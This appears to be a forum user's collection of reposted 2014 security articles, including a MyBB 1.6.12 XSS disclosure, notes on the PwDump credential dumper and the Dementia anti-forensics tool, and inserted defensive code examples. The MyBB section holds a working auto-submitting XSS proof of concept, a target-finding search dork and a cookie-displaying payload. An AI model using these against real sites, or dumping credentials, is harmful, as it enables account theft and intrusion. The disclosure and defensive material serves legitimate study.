Everything posted by Nytro
-
Arch Linux 2014.02.01 Is Now Available for Download
February 2nd, 2014, 11:46 GMT · By Marius Nestor

I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014.

As usual, existing Arch Linux users don't need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia.

Source: Arch Linux 2014.02.01 Is Now Available for Download
-
[h=3]Namedpipe Impersonation Attack[/h]

Privilege escalation through a namedpipe impersonation attack was a real issue back in 2000, when a flaw in the service control manager allowed any user logged onto a machine to steal the identity of SYSTEM. We haven't heard a lot about this topic since then. Is it still an issue?

First of all, let's talk about the problem. When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over.

Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all, there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed.

- SECURITY_ANONYMOUS: The server process cannot obtain identification information about the client, and it cannot impersonate the client.
- SECURITY_IDENTIFICATION: The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read.
- SECURITY_IMPERSONATION (this is the default): The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems.
- SECURITY_DELEGATION: The server process can impersonate the client's security context on remote systems.

There are also 2 other flags:

- SECURITY_CONTEXT_TRACKING: Specifies that any changes a client makes to its security context are reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system.
- SECURITY_EFFECTIVE_ONLY: Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating.

Note: Since the MSDN documentation for these flags is really weak, I used the definitions that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon.

Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored.

Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozens of programs running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true:

- The caller has the SeImpersonatePrivilege privilege.
- The requested impersonation level is SecurityIdentification or SecurityAnonymous.
- The identity of the client is the same as the server.
- The token of the client was created using LogonUser from inside the same logon session as the server.

Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples:

I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped-down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad.

My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse.

But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using namedpipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging, and if the OS you are debugging is inside VMware, you can specify the namedpipe corresponding to the COM1 port of the VMware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started Windbg, the untrusted application was able to steal its token.

To be fair I have to say that VMware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started Windbg knowing that. But, eh, who reads error messages?

What should we do now? Well, it turns out that Microsoft implemented two new restrictions in Windows Vista to fix these problems. I don't think they are documented yet.

- If the token of a server is restricted, it can impersonate only clients also running with a restricted token.
- The server cannot impersonate a client running at a higher integrity level.

These new restrictions fix both my issues. First of all, my untrusted application can't be running with a restricted token anymore. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt, because they are running with a High Integrity Level.

Now it is time to come back to the main question: Is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel!

--

Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page.

Related link: Impersonation isn't dangerous by David Leblanc

Posted by nsylvain at 4:54 PM

Source: The Final Stream: Namedpipe Impersonation Attack
-
MRG Effitas automatic XOR decryptor tool
Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments

Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires "never reuse the XOR key". Binary files usually have long sequences of null bytes, which means the short XOR key (4 ASCII characters in most of the cases) used by the malware writers can be spotted in the binary as a recurring pattern.

This Python script (tested and developed on Python 3.3) can find these recurring patterns in the beginning of the XOR encrypted binary, calculate the correct "offset" of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases; in other cases, fine-tuning the default parameters can help.

We used this tool to decrypt the XOR encrypted binaries found in network dumps, for example when exploit kits (e.g. Neutrino) were able to infect the victim and the payload is delivered to the victim as a XOR encrypted binary.

For a list of parameters, run:
# python auto_xor_decryptor.py -h

The tool is released under the GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py

An example run of the tool looks like the following:

c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3
Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3!
This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary.
Most parameters are good on default but if it is not working for you, you might try to fine-tune those.
XOR key: b'626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862'
XOR key ascii: b'bjkh'
XOR key hex: b'626a6b68'
Offset: 1
Final XOR key: b'jkhb'
Great success!
input read from : malware\48_.mp3, output written to : decrypted

MRG Effitas Team

Source: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas
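The recovery idea the post describes (a null run in the plaintext leaks the key as a repeating pattern, which then has to be rotated back to the file's key phase and checked against known strings), as an added example. This is not the MRG Effitas script: the key length, scan window, known-string list and the "offset" convention (key index = file position mod key length) are this example's own assumptions, and the encrypted sample is constructed inline rather than taken from a real capture. It goes one step beyond the post by trying candidates longest-run-first and rejecting those that come from repeated non-null filler.

```python
"""Recover a short repeating XOR key from an encrypted binary.

Added example (not the MRG Effitas script): a run of null bytes in the
plaintext leaks the key as a repeating pattern in the ciphertext; the pattern
is rotated back to the file's key phase and validated with a known-string
check. Key length, scan window, known strings and the "offset" convention
(key index = file position mod key length) are this example's assumptions.
"""
from typing import List, Optional, Tuple

# Strings expected in a decrypted Windows executable (assumption: PE payload).
KNOWN_STRINGS = (b"This program cannot be run in DOS mode", b"PE\x00\x00")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with the key repeated from file offset 0."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def candidate_patterns(data: bytes, key_len: int = 4, scan_len: int = 4096,
                       min_repeats: int = 8) -> List[Tuple[int, int, bytes]]:
    """Find key_len-byte chunks that repeat back-to-back in the first scan_len bytes.

    Returns (run_length, position, chunk) tuples, longest run first. Where the
    plaintext is all 0x00, the ciphertext is the key itself rotated by the
    region's position, so every such chunk is a rotated key candidate.
    """
    window = data[:scan_len]
    found = []
    pos = 0
    while pos + key_len * min_repeats <= len(window):
        chunk = window[pos:pos + key_len]
        run = 1
        while window[pos + run * key_len:pos + (run + 1) * key_len] == chunk:
            run += 1
        if run >= min_repeats:
            found.append((run, pos, chunk))
            pos += run * key_len  # skip the rest of this region
        else:
            pos += 1
    found.sort(key=lambda t: t[0], reverse=True)
    return found


def unrotate(chunk: bytes, pos: int) -> bytes:
    """Over a null region ciphertext[pos + i] == key[(pos + i) % n],
    so key[j] == chunk[(j - pos) % n]."""
    n = len(chunk)
    return bytes(chunk[(j - pos) % n] for j in range(n))


def auto_decrypt(data: bytes, key_len: int = 4) -> Optional[Tuple[bytes, bytes]]:
    """Try candidate keys, longest repeating run first; return (key, plaintext)
    for the first one that yields a known string, else None. A repeated
    non-null filler (e.g. 0x90 padding) produces a wrong candidate, which the
    known-string check rejects."""
    tried = set()
    for _run, pos, chunk in candidate_patterns(data, key_len):
        key = unrotate(chunk, pos)
        if key in tried:
            continue
        tried.add(key)
        plain = xor_with_key(data, key)
        if any(s in plain for s in KNOWN_STRINGS):
            return key, plain
    return None


# Constructed sample (not real malware): a fake PE-like layout with a null run
# after the header, a 0x90 filler region as a decoy, and more null padding,
# encrypted with the 4-byte key the post recovered.
SAMPLE_KEY = b"jkhb"
SAMPLE_PLAINTEXT = (b"MZ\x90\x00" + b"\x00" * 60
                    + b"This program cannot be run in DOS mode"
                    + b"\x90" * 400 + b"\x00" * 200
                    + b"PE\x00\x00" + b"\x00" * 300)
SAMPLE_ENCRYPTED = xor_with_key(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    result = auto_decrypt(SAMPLE_ENCRYPTED)
    if result is None:
        print("no key found; try another key length or scan window")
    else:
        key, plain = result
        print("XOR key:", key, "| plaintext starts with MZ:", plain.startswith(b"MZ"))
```

The decoy region is the case worth understanding: the longest repeating run in the sample comes from 0x90 filler, not from nulls, and it yields a candidate equal to the real key XOR 0x90. Only the known-string check separates the two, which is why the tool's parameters (key length, window, expected strings) matter when the default run fails.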
-
A Field Study of Run-Time Location Access Disclosures on Android Smartphones
Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser
Rutgers University
Please contact janne@winlab.rutgers.edu for any inquiries

Abstract: Smartphone users are increasingly using apps that can access their location. Often these accesses can be without users' knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps' location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants' smartphones. In particular, the method did not need any changes to participants' phones beyond installing our study app. We randomly divided our participants into two groups: a Disclosure group (N=13), who received our disclosures, and a No Disclosure group (N=9), who received no disclosures from us. Our results confirm that the Android platform's location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would not have expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that because of the disclosures most of them had taken actions to manage their apps' location access.

Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf
-
[h=1]Dementia[/h]

Dementia is a proof-of-concept memory anti-forensic toolkit designed for hiding various artifacts inside the memory dump during memory acquisition on the Microsoft Windows operating system. It works by exploiting memory acquisition tools and hiding operating system artifacts (e.g. processes, threads, etc.) from the analysis application, such as Volatility, Memoryze and others. Because of the flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools completely from user mode. For further details about Dementia, check the 29c3 presentation (PDF or video below).

Downloads
- Defeating Windows memory forensics.pdf
- Dementia-1.0-x64.zip
- Dementia-1.0.zip

Source: https://code.google.com/p/dementia-forensics/
-
Quarks PwDump
Mon 14 May 2012, by Sébastien Kaczmarek

Quarks PwDump is a new open source tool to dump various types of Windows credentials: local accounts, domain accounts, cached domain credentials and Bitlocker. The tool is currently dedicated to working live on operating systems, limiting the risk of undermining their integrity or stability. It requires administrator privileges and is still in beta test.

Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts:
- Local accounts NT/LM hashes + history
- Domain accounts NT/LM hashes + history stored in the NTDS.dit file
- Cached domain credentials
- Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit

JOHN and LC formats are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8.

Why another pwdump-like dumper tool?
- No tool can actually dump all kinds of hashes and Bitlocker information at the same time; a combination of tools is always needed.
- The libesedb (http://sourceforge.net/projects/libesedb/) library encounters some rare crashes when parsing different NTDS.dit files. It's safer to directly use the Microsoft JET/ESE API to parse databases originally built with the same functions.
- The Bitlocker case has been added even if some specific Microsoft tools could be used to dump that information (Active Directory add-ons or VBS scripts).

The tool is currently dedicated to working live on operating systems, limiting the risk of undermining their integrity or stability. It requires administrator privileges. We plan to make it work fully offline, for example on a disk image.

How does it internally work?

Case #1: Domain account hashes are extracted offline from NTDS.dit

It's not currently a fully offline dump because Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET database parsing), which differs between Windows versions. For example, it's not possible to parse a Win 2008 NTDS.dit file from XP. In fact, record checksums are computed in a different manner and database files appear corrupted to the API functions. That's currently the main drawback of the tool: everything should be done on the domain controller. However, no code injection or service installation is made, and it's possible to securely copy the NTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service).

Case #2: Bitlocker information dump

It's possible to retrieve interesting information from Active Directory if some specific GPOs have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy).
- Recovery password: a 48-digit passphrase which allows a user to mount their partition even if their password has been lost. This password can be used in the Bitlocker recovery console.
- Key package: a binary keyfile which allows a user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially the Bitlocker Repair Tool.

For each entry found in NTDS.dit, Quarks PwDump shows the recovery password on STDOUT, and keyfiles (key packages) are stored in separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk, ...
- Volume GUID: a unique value for each BitLocker-encrypted volume.
- Recovery GUID: recovery password identifier; it could be the same for different encrypted volumes.

Quarks PwDump does not retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in the AD directory service. This information can then be used to reset ownership of the TPM. This feature will be added in a further release.

In an enterprise environment, those GPOs should often be applied in order to ensure administrators can unlock a protected volume and employers can read specific files following an incident (intrusion or various malicious acts, for example).

Case #3: Local account and cached domain credentials

There isn't anything really new here; a lot of tools are already dumping them without any problems. However, we have chosen an uncommon way to dump them; only a few tools use this technique. Hashes are extracted live from the SAM and SECURITY hives in a proper way, without code injection or a service. In fact, we use the native registry API, especially the RegSaveKey() and RegLoadKey() functions, which require the SeBackup and SeRestore privileges. Next we mount the SAM/REGISTRY hives on a different mount point and change all key ACLs in order to extend privileges to the Administrator group and not LocalSystem only. That's why we choose to work on a backup, to preserve system integrity.

Writing this tool was not a really difficult challenge; Windows hash and Bitlocker information storage methodology is mostly well documented. However, it's an interesting project to understand Microsoft's strange implementation and choices for each kind of storage:
- High-level obfuscation techniques are used for local and domain account hashes: many constants, atypical registry value names, a useless ciphering layer, hidden constants stored in the registry Class attribute, ... However, it can be easily defeated.
- The algorithms used sometimes differ between Windows versions and the global credential storage approach isn't regular. We can find, exhaustively: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES.
- Bitlocker information is stored in cleartext in AD domain services.

The project is still in beta test and we would really appreciate feedback or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license):

Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump

For NTDS parsing technical details, you can also refer to the MISC MAG #59 article by Thibault Leveslin. Finally, we would like to greet the NTDS hash dump (Csaba Barta), libesedb and creddump authors for their excellent work.

Source: Quarks PwDump
-
Accidental API Key Exposure is a Major Problem

This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket."

Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos is a common occurrence.

As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000.

But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them. But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history.

So what can we do about this?

Replace sensitive information with placeholders

If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or "<api key here>" or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository.

Storing sensitive information outside of source control

Some common methods of storing sensitive information that won't show up in your repository are:
- Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app).
- Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs. Depending on your programming language of choice, there may be some libraries available to help you with this, like nconf for Node.js, or any of these RubyGems.

Removing sensitive information that's already in your repository

As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough. If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added. If you are using git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours.

Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users.

Source: Accidental API Key Exposure is a Major Problem | Ross Penman
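Two of the article's points side by side, as an added example that is not the author's Ruby script: a scanner that checks every revision rather than only the current file contents (so a token "removed" in a later commit still shows up), and a loader that takes the secret from the environment and refuses placeholder values. The token regexes are illustrative assumptions, not a complete list, and the commit records are constructed inline instead of being read from git.

```python
"""Find credentials left in repository history, and load them from the
environment instead. Added example, not code from the article. The token
formats are illustrative regexes (assumption, not an exhaustive list), and the
commit records are constructed inline instead of being read from git.
"""
import re
from typing import Dict, Iterable, List, Mapping

# Illustrative patterns (assumption): a Twilio-style 32-hex auth token next to
# its variable name, an AWS-style access key id, and a generic quoted password.
SECRET_PATTERNS = {
    "twilio_auth_token": re.compile(r"auth_?token\W{0,5}([0-9a-f]{32})\b", re.I),
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "hardcoded_password": re.compile(r"password\s*[:=]\s*['\"]([^'\"]{8,})['\"]", re.I),
}
# Values that are placeholders rather than real secrets.
PLACEHOLDERS = {"<api key here>", "changeme", "your_token_here"}


def scan_text(text: str) -> List[Dict[str, object]]:
    """Return one finding per match, skipping placeholder values."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(line):
                value = match.group(1)
                if value.lower() in PLACEHOLDERS:
                    continue
                findings.append({"type": name, "line": lineno, "value": value})
    return findings


def scan_history(commits: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Check every revision, not just HEAD: a token deleted in a later commit is
    still readable in the earlier one."""
    out = []
    for commit in commits:
        for finding in scan_text(commit["content"]):
            out.append({"commit": commit["commit"], "path": commit["path"], **finding})
    return out


def load_secret(name: str, env: Mapping[str, str]) -> str:
    """Read a secret from the environment (pass os.environ in real use) and
    refuse empty or placeholder values so a missing setting fails loudly."""
    value = env.get(name, "")
    if not value or value.lower() in PLACEHOLDERS:
        raise LookupError(f"{name} is not set to a real value")
    return value


# Constructed commit history (not a real repository): the first commit shipped
# real-looking values, the second "removed" them by switching to the environment.
SAMPLE_COMMITS = [
    {"commit": "c1-constructed", "path": "settings.py", "content": (
        'TWILIO_ACCOUNT_SID = "ACconstructed"\n'
        'TWILIO_AUTH_TOKEN = "0123456789abcdef0123456789abcdef"\n'
        'AWS_ACCESS_KEY_ID = "AKIAEXAMPLEEXAMPLE00"\n'
        'DB_PASSWORD = "hunter22-constructed"\n')},
    {"commit": "c2-constructed", "path": "settings.py", "content": (
        'import os\n'
        'TWILIO_AUTH_TOKEN = os.environ["TWILIO_AUTH_TOKEN"]\n'
        'AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]\n'
        'DB_PASSWORD = "<api key here>"\n')},
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_COMMITS):
        print(f"{f['commit']} {f['path']}:{f['line']} {f['type']} -> {f['value']}")
```

Run against the constructed history, the HEAD revision is clean but the first commit still yields all three credentials, which is exactly why revoking the key or rewriting history is needed rather than a plain delete-and-commit. In a real repository the `content` field would come from `git show <commit>:<path>` for each revision.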
-
MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given:

<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%')

This made me analyze and reverse this to find the cause. After filtering out, this was the correct input which can cause this error. This part should be constant: or'("\

To reproduce this issue you can add any char value in front of or'("\ and 2 char values after or'("\, and you cannot have any spaces in between them. This will be the skeleton:

[1 char value]or'("\[2 char values]

Examples:
1or'("\00
qor'("\2a

You can have a space like this: qor'("\ a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%')

How to Inject JavaScript and HTML?

We can inject HTML + JavaScript, but search.php filters out ' " [] - characters. This is the method you could use to inject your payload. If we put our constant in the middle, we can inject our payload in front of and after it. If we inject it at the beginning of the constant, the payload will be stored in this manner:

<Payload here>qor'("\2a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<Payload Here>qor (%' LOWER(t.subject) LIKE '%\2a%')

For example, if we inject a HTML header at the beginning:

<h1>Osanda</h1>qor'("\2a

It will look like this inside the source:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<h1>Osanda</h1>qor (%' LOWER(t.subject) LIKE '%\2a%')

Now if we try injecting at the end of our payload, it will be stored in two places like this in the source:

qor'("\2a<Payload Here>

The payload is thrown out in the SQL error itself:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3

The second place is inside the query:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a<payload here>%')

Example: This would be an example of JavaScript being interpreted: <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember this filters out ' " [] - characters. Therefore we can use an external script source for performing further client side attacks.

Proof of Concept

<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords" value="qor'(&quot;\2a<script>alert(/XSS/)</script> " />
<script>document.exploit.submit();</script>
</form>
</body>
</html>

POC Video

You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this:

<script src=poc />qor'("\2a</script>

This will be contained in the poc file:

document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');

Thanks to Hood3dRob1n for this idea. I have no idea how to inject SQL via this bug. You may give it a try and see.

Source: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith
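The root causes in the write-up are a query built by splitting and splicing the keyword into SQL text, and an error page that reflects that text back unescaped. The hardened counterpart, as an added example that is not MyBB's code: the keyword is bound as a parameter (so quotes and backslashes in it never alter the statement), LIKE wildcards from the user are escaped, database errors are not echoed, and the keyword is HTML-escaped when reflected. It uses an in-memory sqlite3 table as a constructed stand-in for mybb_threads.

```python
"""Hardened counterpart to the search handling described above. The keyword is
bound as a query parameter (the SQL text never changes, whatever quotes or
backslashes it contains), LIKE wildcards from the user are escaped, database
errors are not echoed back, and the keyword is HTML-escaped when reflected.
Added example using sqlite3 in memory; not MyBB's code, and the threads table
is a constructed stand-in for mybb_threads.
"""
import html
import sqlite3
from typing import List, Tuple

# The post's test string that breaks the original query builder.
MALFORMED_KEYWORD = 'qor\'("\\2a<script>alert(/XSS/)</script>'


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE threads (tid INTEGER PRIMARY KEY, firstpost INTEGER, "
                 "subject TEXT, closed TEXT NOT NULL DEFAULT '')")
    conn.executemany(
        "INSERT INTO threads (tid, firstpost, subject, closed) VALUES (?, ?, ?, ?)",
        [(1, 10, "welcome thread", ""),
         (2, 20, "Osanda found a bug", ""),
         (3, 30, "moved thread", "moved|5")])  # constructed rows
    return conn


def escape_like(value: str) -> str:
    """Escape LIKE metacharacters so user input matches literally."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_threads(conn: sqlite3.Connection, keyword: str) -> List[Tuple[int, int]]:
    """Same query shape as the original, but the keyword is a bound parameter."""
    return conn.execute(
        "SELECT tid, firstpost FROM threads WHERE closed NOT LIKE 'moved|%' "
        "AND LOWER(subject) LIKE ? ESCAPE '\\'",
        ("%" + escape_like(keyword.lower()) + "%",),
    ).fetchall()


def render_results(keyword: str, rows: List[Tuple[int, int]]) -> str:
    """Escape everything user-controlled before it is reflected into HTML."""
    items = "".join(f"<li>thread {tid}</li>" for tid, _firstpost in rows)
    return (f"<p>Results for <b>{html.escape(keyword, quote=True)}</b>:</p>"
            f"<ul>{items}</ul>")


def handle_search(conn: sqlite3.Connection, keyword: str) -> str:
    try:
        rows = search_threads(conn, keyword)
    except sqlite3.Error:
        # Never echo the failing SQL or the driver's error text to the user;
        # log it server-side instead.
        return "<p>Search failed.</p>"
    return render_results(keyword, rows)


if __name__ == "__main__":
    db = make_db()
    print(handle_search(db, "osanda"))
    print(handle_search(db, MALFORMED_KEYWORD))
```

Fed the write-up's trigger string, the bound query simply returns no rows instead of failing, and the reflected keyword comes back as `&lt;script&gt;…`, so neither the SQL error path nor the result page gives the input a way to run.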
-
Pwn2Own 2014: Rules and Unicorns
Brian Gorenc, Manager, Vulnerability Research, HP Security Research

HP's Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We'll continue both tracks this year. For 2014, we're introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft's Enhanced Mitigation Experience Toolkit (EMET) protections - truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition.

Contest dates

The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition.

Rules and prizes

